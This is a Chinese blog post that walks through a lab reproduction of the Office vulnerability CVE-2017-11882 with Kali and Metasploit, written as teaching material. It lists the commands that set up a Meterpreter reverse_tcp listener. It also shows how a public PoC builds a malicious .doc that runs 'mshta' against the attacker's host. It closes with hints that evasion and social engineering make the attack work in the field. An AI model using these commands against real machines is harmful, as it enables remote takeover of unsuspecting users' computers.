开篇闲聊:
CVE-2017-11882漏洞复现的文章我之前在公司社区里已经发过一遍了,但是最近又研究了一点并且和CVE-2018-0802结合了一下,觉得这个漏洞还是有必要再写写,顺便凑一下我好久没更新过的社团简书作业吧 : ),此外,本篇漏洞复现旨在给明年的学弟进行kail的教学,所以内容很琐碎,请各位表哥绕道......
漏洞概述:
CVE-2017-11882是一个潜伏17年之久的并于2017年被公开的可以通杀office2003到2016的所有版本的漏洞,攻击者只需给目标发送一个制作好的word文档并且这个文档被打开即可完成攻击。
复现环境:
kail linux
Windows7(亲测Win10也可以,不过需要使用免杀技术,不然会被报毒)
office2016(选择哪个都行,我之前尝试使用2003,激活这关就让我头大)
Poc代码(https://github.com/Ridter/CVE-2017-11882/)(网上挺多的,我给你们随便找了一个)
复现过程:
开启kail终端输入:
root@wuyou:~# ifconfig
查看你的IP然后再开个新终端输入:
root@wuyou:~# msfconsole
msf > search cve-2017-11882
选择哪个都可以,这里我使用了网上的另一个rb文件
msf > use exploit/windows/smb/CVE-2017-11882(看清楚你自己的选项,别直接复制)
输入的时候别忘了自动补齐......
msf exploit(windows/smb/CVE-2017-11882) > show options
查看需要填入的内容
msf exploit(windows/smb/CVE-2017-11882) > set lhost 192.168.190.134
msf exploit(windows/smb/CVE-2017-11882) > set uripath 11882
msf exploit(windows/smb/CVE-2017-11882) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/CVE-2017-11882) > exploit
开始监听
这时开始制作doc文档吧!
进入你放py脚本的文件夹内然后输入命令即可(记得改成你自己的IP)
root@wuyou:~/cve-2017-11882# python CVE-2017-11882.py -c "mshta http://192.168.190.134:8080" -o 11882.doc
然后把制作好的doc文档在靶机上打开
靶机上一切正常
这时渗透机上出现:
Ctrl+C终止掉后选择Session1
msf exploit(windows/smb/CVE-2017-11882) >sessions 1
这时成功连接(如果不行就尝试在靶机右键doc文档点击编辑!打开查看和编辑文档是有区别的)
截个屏玩一下吧
meterpreter > screenshot
结语:
这个漏洞如果想要在实战中使用还要和CVE-2018-0802结合起来并使用一些免杀技术,再结合一点社工才能提高成功率,我写这个复现不是想要大家使用这些去进行攻击,而是我发现通过复现这个漏洞,可以学习到很多的细节方面的知识,而且整天挖洞觉得累了研究几个CVE也是挺有趣的。
网友评论